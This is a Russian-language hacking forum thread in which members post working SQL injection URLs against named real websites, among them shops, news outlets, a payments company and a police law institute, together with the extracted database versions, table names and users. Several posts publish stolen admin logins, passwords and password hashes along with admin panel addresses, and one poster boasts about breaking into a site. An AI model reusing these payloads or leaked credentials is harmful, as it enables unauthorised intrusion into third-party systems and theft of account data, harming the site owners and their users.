SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.dreptonline.ro/stiri/detaliu_stire.php?id_stire=-652+union+select+1,2,3,4,5 ,6,7/*


    version :4.1.22-standard
    user: dreptonl_dr@localhost
    database: dreptonl_dr
     
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.oferta9.ro/magazin2.php?m=-1951+union+sele ct+1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5/*


    version :5.0.45-community
    user : mn76_iuser@localhost
    database: mn76_iuser
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    сайт джорджа сороса

    http://www.osf.ro/ro/program.php?program=-30+union+select+1,2, 3,4,5,6/*
    version: 4.0.18
    user: sitenou@localhost
    database: site2007
     
  4. †c0(aIn?†

    †c0(aIn?† Member

    Joined:
    4 May 2008
    Messages:
    14
    Likes Received:
    5
    Reputations:
    0
    http://www.gans-club.ru/catalogue.php?id=-1+union+select+1,2,3,5,6,7/*

    version: 5.0.24-standard
    user: gansclub1@localhost
    db: db_gansclub1

    http://www.gans-club.ru/admin/

    Админ-лох....мухахаха

    ЗЫ: Как увидел,сколько у них сиги стоят,сразу решил:надо ломать)))
     
    #5424 †c0(aIn?†, 13 May 2008
    Last edited: 13 May 2008
  5. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    http://www.atur.com.ua/index.php?id=-903+union+select+1,2,3,4,5,6+from+users/*

    atur@localhost
    4.1.22
    atur
     
  6. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    какая та игра) посещаемость 0.
    Code:
    http://g1.rezni.net/forum/post.php?a=new_post&forum=-1+UNION+SELECT+null,concat(login,':',pass),null,null+From+users+limit+0,1/*
    rezninet_sred@localhost
    4.1.21
    rezninet_game
    
     
    1 person likes this.
  7. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    Онлайн игра
    Мир гладиаторов

    http://sotovikmar.nov.ru/forum/post.php?a=new_post&forum=-1+union+select+1,concat_ws(char(58),name,pass),3,4+from+users+limit+1+offset+2/*

    kaskara_sotm@localhost
    4.1.21-standard
    kaskara_sotm
     
    #5427 neon_fx, 14 May 2008
    Last edited: 14 May 2008
  8. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    http://www.agarev.com/website.php?id=-1+union+select+1,lgn,pswd,4+from+agrv_user/*
    Вывод в саммом низум под баннерами!
     
  9. Vid0k

    Vid0k Elder - Старейшина

    Joined:
    24 Dec 2007
    Messages:
    393
    Likes Received:
    125
    Reputations:
    13
    E-Shop

    одна почти раскрученная остальные нет просто не успел решил выложить чтобы не валялись без дела
    и так поехали:
    http://www.quicktech.com.tw/eshop_en/class_b.asp?ID=47'
    =
    [Microsoft][ODBC SQL Server Driver][SQL Server]? nvarchar ?? 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Personal Edition on Windows NT 5.2 (Build 3790: Service Pack 2) '
    =
    БД-'DataSQL_eshop_EN'
    таблицы и поля:
    AD
    AdMail
    Classl
    Employees
    News
    QA
    ActionCount
    ADRecord
    ClassII
    comd_list
    Company
    D99_CMD
    D99_Tmp
    dtproperties
    EditRecord
    GroupMember
    LoginRecord
    Member(ID,GID,MemberType,UserName,PassWord,Name,PetName,Sex,Phone,Birthday,Mobile,EMail,Address,Memo1,Memo2)
    OrderRecord
    Orders
    Porduct
    sysconstraints
    syssegments
    t_jiaozhu
    не раскрученные внимание на некоторых пишутся логи об ошибках мускула заходить только через прокси:
    http://eshop.i-cable.com/eshop/eng/index.php?cat_id=2&subcat_id=12'
    =
    http://www.rhysko.co.uk/eshop2.asp?category=2'
    =
    http://www.wohlfahrt.com/USA2004/ArtikelDetail.cfm?ArtikelIdentitaet=6034'&pSessionSessionID=84875494-usa-5555330527022008;eshop;2&pSessionKundenID=0&pSessionSprachID=2&Pfad=Spare%20Parts%20%26%23149%3B%20Pyramid%20Candleholders
    =
    http://www.nebesa.com/eShop/Game.aspx?FamilyId=23&BrandId=6117'
    =
    http://eshop.whtt.org/eshop.php?id=28'
    =
    http://www.tashop.ru/order/frame.asp?id=97'
    =
    http://www.uniway.be/reference.aspx?id=239'
    =
    http://www.baymed.org/body.cfm?id=147'
    =
    http://shop.middleeast.com/detail.aspx?ID=935'
    =
    http://www.411asp.net/func/review?tree=411asp/webapps/shopping&id=6449910'
    =
    http://eshop.ecu.edu.au/shopdisplayproducts.asp?id=1'&cat=Fees+%26+Charges
    =
    http://www.littlelambstory.com/store/message.php?id=2'
    =
    http://www.80mbusmodel.com/eshop/ProductsList.aspx?ID=10'
    =
    http://www.obedienceuk.com/shop/products.asp?id=6'&cat=Puppies%20for%20Sale
    =
    http://www.realestatedynamics.com.au/eshop/shop_product.aspx?id=16'
    =
    http://www.galser-sib.ru/eshop/category.asp?id=183'
    =
    http://www.fastgear.biz/index.cfm?id=3974&pageid=123'
    =
    http://www.camperscorner.com.sg/eshop/product.php?id=2076'
    =
     
  10. LUKAC

    LUKAC Banned

    Joined:
    19 Aug 2007
    Messages:
    0
    Likes Received:
    6
    Reputations:
    0
    Вот пак -)

    http://www.flirtanica.ru/articles1.php?id=-203+union+select+1,2,3,4,version()/*
    ]http://www.oracul.kiev.ua/news_view.php?id=-140+union+select+1,2,3,4,5,version(),7/
    ]http://www.biblioteka-ua.com/select_biblio.php?id=1651+union+select+1,version(),3,4,5/* -в самом низу вывод
    http://eggs.com.ua/humor.php?id=-16+union+select+1,2,3,version(),5,6,7,8,9,10/*
    ]http://climb.com.ua/aboutbook.php?id=233+union+select+1,2,3,table_name,5,6+from+information_schema.tables/*
    http://www.mgz.com.ua/ogl_inet.php?ogl_id=-24387+union+select+1,2,3,4,5,version(),7,8,9,0,1,2,3/*
    http://www.chatelet-theatre.com/fiche_spectacle.php?id=-146+union+select+1,2,3,4,5,6,7,version(),9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7/*
    http://www.cahiersdufootball.net/article.php?id=-2728+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2/*
    http://www.frontnational.com/communique_detail.php?id=-1599+union+select+1,2,3,table_name+from+information_schema.tables+limit+26,1/*
    http://www.buchakademie.de/sem/sem.php3?id=-883+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6/*
    http://www.imi-online.de/2008.php3?id=-1692+union+select+version(),2/*
    http://www.echtenamen.de/kategorie.php4?id=19+union+select+1,version(),3,4/*
    http://www.regenwald.org/news.php?id=777+union+select+1,2,3,4,5,6,table_name,8,9,0,1,2,3,4,5,6+from+information_schema.tables/*
    http://www.tribaldance.com.ua/index.php?id=5+union+select+1,2,3,4/*
    http://www.chicco.com.ua/faq2.php?id=1+union+select+1,version()/*
    http://www.press.cv.ua/show_an.php?id=-1408+union+select+1,version()/*
    http://cbn-cp.com/preview.php?id=-36+union+select+1,2,concat_ws(char(58),mail),4,5,6,7,8,9,0,1,2,3+from+mail/*
    http://fri.net.ua/loadpsb.php?id=-520+union+select+1,2,3,concat_ws(char(58,58),userlogin,userpsswd),5,6,7,8,9+from+users+limit+100,1/*
    http://valiza.com.ua/opinions.php?id=-122+union+select+1,2,3,concat_ws(char(58,58),user_id,username,password),5,6,7+from+phorum_users/*
    http://www.aquariumist.com.ua/spr.php?id=-8+union+select+1,2,version()/*
    http://www.doggy.kiev.ua/pages.php?id=4+union+select+1,2,version(),4,5/*
    http://www.big6.com/showarticle.php?id=-16+union+select+version(),2,3,4,5/*
    http://www.comingsoon.net/films.php?id=-15813+union+select+version()/*
    http://www.michaelpollan.com/article.php?id=-80+union+select+1,version(),3,4,5,6,7,8,9,0/*
    http://www.isoc.be/news.php?ID=-31+union+select+1,2,3,4,5,version(),7,8,9,0,1,2,3,4,5,6,7,8/*
    http://www.fcdynamo.ru/material.php?id=-642'+union+select+1,concat_ws(char(58),UserID,Login,Password),3,4,5,6,7,8+from+ut_users/*
    http://www.energetika.cz/index.php?id=147+union+select+1,2,3,4,5,version(),7,8,9,0/*
    http://www.radiovaticana.cz/clanek.php4?id=9189+union+select+1,2,table_name,4,5,6,7,8,9,0,1,2,3+from+information_schema.tables/*
    http://www.management.com.ua/announce.php?id=150+union+select+1,2,3,concat(char(58),id,username,password),5+from+admins/* - 4 версия... лень таблицу было искать
    http://www.jazz.koktebel.info/participant.php?id=11'+union+select+1,2,3,4,5,6,7,version()/*
    http://ukrfoto.dp.ua/download.php?id=166+union+select+1,2,version(),4,5,6/*
    http://www.haydamaky.com/ua/main.php?id=-392+union+select+1,2,3,4,version(),6,7,8,9/*
    http://www.worstpreviews.com/review.php?id=-982+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,version(),31,32,33,34,35,36,37,38,39,40/*
    http://www.roadtothemiddleclass.com/chappies.php?id=-84+union+select+version(),2,3/*
    http://www.emap.usask.ca/news/read.php?id=-107+union+select+1,2,3,version(),5,6,7,8,9,10/*
    http://www.bunny-comic.com/index.php?id=-1010+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables+limit+15,1/*
    http://underwaredesign.com/prod_detail.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19/*
    http://www.freepoc.org/viewapp.php?id=-2+union+select+1,2,3,4,5,6,7,version()/*
    http://www.railpictures.net/viewphoto.php?id=-190094+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,table_name,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+information_schema%20.tables/*
    http://www.michaelpollan.com/article.php?id=-87+union+select+1,version(),3,4,5,6,7,8,9,10/*

    ]http://www.kiis.com.ua/index.php?id=2&sp=1+UNION+SELECT+1,2,3,4,Table_name,6,7,8,9+from+information_schema.tables/*
    http://chgk.com.ru/person.php?id=-600+UNION+SELECT+1,2,3,4,version(),6,7/*
    http://kinoinet.tv/productinfo.php?id=-1446+UNION+SELECT+version(),2/*
    http://abris.name/a-imglib/showimg.php?id=-21+union+select+1,2,version(),4,5,6,7,8/*
    http://www.ecodefense.ru/view.php?id=-526+union+select+1,2,3,4,5,6,7,8,9,version(),11/*
    птом добавлю есчё

    http://www.ukrbiznes.com/website.php?id=66551+union+select+version(),2,3,4,5,6,7,8,9,0,1,2/* - кому не лень обходить фильтрацию... 12 таблиц ... !
    http://www.ukrnic.com/hosting_info.php?id=2+union+select+1,2,version()/*

    ===============================================================================================================
    http://www.zcasher.info/products.php?id=4'+union+select+1,2,3,table_name,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables/*
    обменный пункт вмз
    таблицы снизу , выбрал всю связаное с юзерами

    cap_partners
    cap_users
    exch_clients
    zmc2_adminusers
    zmc2_users
    uab_partners
    ===============================================================================================================
     
    #5430 LUKAC, 15 May 2008
    Last edited: 15 May 2008
    2 people like this.
  11. lastsmile

    lastsmile Elder - Старейшина

    Joined:
    22 Sep 2007
    Messages:
    40
    Likes Received:
    10
    Reputations:
    0
    http://www.flipskateboards.com/news.php?id=-9999'+union+select+table_name,column_name+from+information_schema.columns+limit+264,1/*

    http://www.flipskateboards.com/admin/
    login/pass: arjan

    ----------------

    http://www.classicalsource.com/db_control/db_cd_review.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,id,password,user_name,15,16,17,18,19,20,21,22,23+from+user+limit+0,1/*

    http://www.classicalsource.com/admin/site_admin.php
    login: davef
    pass: qpd45122
     
    #5431 lastsmile, 15 May 2008
    Last edited: 15 May 2008
    1 person likes this.
  12. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    http://www.infra-m.ru/live/news.asp?date=03.03.2008&id=471468+or+1=@@version--

    SQL Server 2005 - 9.00.3054.00 (X64) Mar 23 2007 18:41:50 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

    //******************************
    http://www.rkgarant.ru/news.asp?id=376+or+1=@@version--

    'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

    http://www.rkgarant.ru/news.asp?id=376+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+TOP+32+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(0x2345)))--
    таблица юзеров
     
    #5432 neon_fx, 15 May 2008
    Last edited: 15 May 2008
    1 person likes this.
  13. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    aiman.eu
    Code:
    http://www.aiman.eu/index.php?id=-1+union+select+1,2,3,concat_ws(0x3,version(),user(),database()),5,6,7,8,9,10/*
    
    4.0.27-max-log[email protected]db161593031
    Code:
    http://www.aiman.eu/index.php?id=-1+union+select+1,2,3,concat(login,0x3,pass),5,6,7,8,9,10+from+admin/*
    aimanff8ac4f495af20f4a7c63d4644d568b5:schmann
    Админка: http://www.aiman.eu/admin/
     
    2 people like this.
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.atlasmonde.net/pays.php?idp=-1+union+select+1,2,3,table_name,5,6,7,8,9,0,1,2,3,4,5,6,7+from+in formation_schema.tables+limit+18,1/*


    version: 5.0.22
    user : altasmonde_user@localhost
    database : altasmonde_base
     
  15. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    интернет-трейдинг

    http://www.netinvestor.ru/news.asp?id=851142+or+1=@@VERSION

    'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

    Юзеры и пасы
    http://www.netinvestor.ru/news.asp?id=851142+or+1=(SELECT+TOP+1+password+from+usertable+WHERE+password+NOT+IN+(SELECT+TOP+10+password+from+usertable+WHERE+password+NOT+IN+(0x23)))--
     
    1 person likes this.
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,table_name,5,6, 7,8+from+information_schema.tables+l imit+16,1/*
    нужная нам табла

    http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x61646d696e/*

    0x61646d696e = admin

    http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,concat_ws(0x3a,nick,password),5,6,7,8+from+admin/*

    вот собственно и все что надо....

    ах да, совсем забыл

    http://www.comeniuskft.hu/admin.php
     
  17. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    http://www.win-developers.com/forum/show.asp?id=606&fid=178++or+1=@@version--

    'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)
     
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.motorcitysuns.com/team.php?id=-1+union+sel ect+1,,2, 3,4/*


    version: 4.1.22-standard-log
    user : oaklands_1@localhost
    database : oaklands_1
     
  19. Mr. P.S.

    Mr. P.S. Elder - Старейшина

    Joined:
    27 May 2007
    Messages:
    179
    Likes Received:
    296
    Reputations:
    35
    fexco.com
    the global payments group

    Code:
    http://www.fexco.com/viewjob.php?id=-105+union+select+1,2,concat_ws(0x3203a20,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15/*
    version: 5.0.45-community-log
    user: [email protected]
    database: splashg_fexco

    Code:
    http://www.fexco.com/viewjob.php?id=-105+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+1,1/*
     
    #5439 Mr. P.S., 16 May 2008
    Last edited: 16 May 2008
  20. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    РОСТОВСКИЙ ЮРИДИЧЕСКИЙ ИНСТИТУТ МВД РОССИИ

    http://www.rui.rsd.ru/print/news.asp?newsId=5698+or+1=@@version--

    'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

    http://www.rui.rsd.ru/print/news.asp?newsId=5698+or+1=(select%20db_name())--
    DB- rui
    User-SITE\IUSR_WEB3
     
    1 person likes this.
Thread Status:
Not open for further replies.